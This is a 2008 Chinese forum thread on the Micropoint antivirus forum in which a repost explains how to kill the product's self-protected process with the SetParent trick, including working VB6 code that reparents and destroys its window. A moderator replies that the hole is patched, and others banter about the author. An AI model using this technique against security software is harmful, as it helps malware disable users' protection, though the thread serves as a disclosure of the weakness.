微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 主动防御 » VB6  

 12  1/2  1  2  > 
作者:
标题: VB6
点饭的百度空间
银牌会员




积分 2315
发帖 2236
注册 2007-11-30
#1  VB6

作者 517826104   2008-04-08 17:22
http://hi.baidu.com/517826104/bl ... 48a1e909fa9350.html

微点,不错的一个杀软,用“主动防御”的思路拦截病毒,在中国来说是一个创新,

和流行的杀毒软件一样,他也弄了进程保护(虽然在任务管理器里面还是可以杀掉他的进程,这应该是软件故意在“放水”)。

不过在这次的试验中,微点的进程出人意料的被我用一个很简陋的办法干掉了!

还是 SetParent 大法,可能只要找准窗口的句柄,再好的 SYS 都没用把(用这个办法我已经成功破解360等软件的自我保护,甚至是废掉卡巴!)

以下是实现具体的过程思路:

创建窗口 CreateWindowEx

想办法查找窗口的句柄(现在还没有很好的办法,不过用 GetForegroundwindow 在右键托盘图标的时候可以获得)

设置父容器 SetParent

销毁自己的窗口 DestroyWindow

就是用我以前提过的 SetParent 大法就能干掉微点。(由于是试验,我只用了VB写代码VC的代码正在整理中,周末再发。。^_^)

VB6的:

声明API:

SetParent ,GetForegroundWindow ,GetWindowText

两个FORM添加一个TIMER到窗体FORM1里面,然后输入代码

'By ChiChou ,QQ517826104 ,本代码仅供研究学习,如有任何人或组织用以编写恶意程序,作者将不符任何法律责任!

'(小声地:我只有15岁,按理说POLICE是不会抓我的吧~~~~ ^_^)

Private Sub Timer1_Timer() '这个计时器用来关闭微点
    Dim winTitle As String
    Dim i As Long
    Dim tmpHwnd As Long

    sString = Space(255) '缓冲区,,做过类似程序的人应该知道是怎么回事
    ssLong = Len(sString)
    tmpHwnd = GetForegroundWindow() '获得前台窗口

    'Call SendMessage(tmpHwnd, WM_GETTEXT, 255, ByVal sString)
    Call GetWindowText(tmpHwnd, sString, ssLong) '取得窗口标题
    sString = LCase(sString)
    Debug.Print sString

     If InStr(sString, "微点") <> 0 Then '是微点的窗口
           Load Form2 '销毁!
           Call SetParent(tmpHwnd, Form2.hWnd)
           Unload Form2
     End If '这时候微点就挂了

End Sub

按F5试验一下。您只需要单击一下微点的托盘图标,微点就跟您再见了!

[ Last edited by 点饭的百度空间 on 2009-1-7 at 23:59 ]

※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint
2008-5-2 17:47
查看资料  发送邮件  访问主页  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#2  

感谢反黑版主的反馈,此方法微点最新版本已经针对其做了处理,加强了对自身进程的保护。

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2008-5-2 17:51
查看资料  发短消息   编辑帖子
gudan
高级用户





积分 605
发帖 579
注册 2007-7-20
#3  

哈哈,~~都爆漏了

※ ※ ※ 本文纯属【gudan】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-5-2 22:10
查看资料  发短消息   编辑帖子
jaber
版主

使用与技巧区版主


积分 2861
发帖 2835
注册 2006-6-6
#4  

点饭的百度空间是MJ???


纯属爆料

※ ※ ※ 本文纯属【jaber】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

XP2(原版未打补丁)
单独微点预升级

2008-5-3 09:58
查看资料  发送邮件  发短消息   编辑帖子
点饭的百度空间
银牌会员




积分 2315
发帖 2236
注册 2007-11-30
#5  

楼上都搞错啦 那个517826104不是反黑

※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint
2008-5-3 10:25
查看资料  发送邮件  访问主页  发短消息   编辑帖子
点饭的百度空间
银牌会员




积分 2315
发帖 2236
注册 2007-11-30
#6  



  Quote:
Originally posted by qq517826104 at 2008-5-5 17:20:
你们在说我么,哈哈
The code is Writen by me...

就是他就是他!! 过微点的就是他 绑起来烤了

※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint
2008-5-6 12:01
查看资料  发送邮件  访问主页  发短消息   编辑帖子
囚中城
版主

微点茶室甜点师


积分 3808
发帖 3688
注册 2006-1-3
来自 拿灵魂换生命的地方
#7  

作者才15岁?

※ ※ ※ 本文纯属【囚中城】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

2008-5-7 18:16
查看资料  发短消息  QQ   编辑帖子
gudan
高级用户





积分 605
发帖 579
注册 2007-7-20
#8  



  Quote:
Originally posted by 点饭的百度空间 at 2008-5-6 12:01:


就是他就是他!! 过微点的就是他 绑起来烤了

好野蛮的mm

※ ※ ※ 本文纯属【gudan】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-5-7 23:46
查看资料  发短消息   编辑帖子
canel
新手上路





积分 4
发帖 4
注册 2008-5-8
#9  

吹吧你就.卡巴 你干掉一个我看看..

※ ※ ※ 本文纯属【canel】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-5-8 22:56
查看资料  发送邮件  发短消息   编辑帖子
canel
新手上路





积分 4
发帖 4
注册 2008-5-8
#10  

别用修改时间和恢复SSDT段.你干掉一个。 我看一下。

※ ※ ※ 本文纯属【canel】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-5-8 22:57
查看资料  发送邮件  发短消息   编辑帖子
 12  1/2  1  2  > 



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号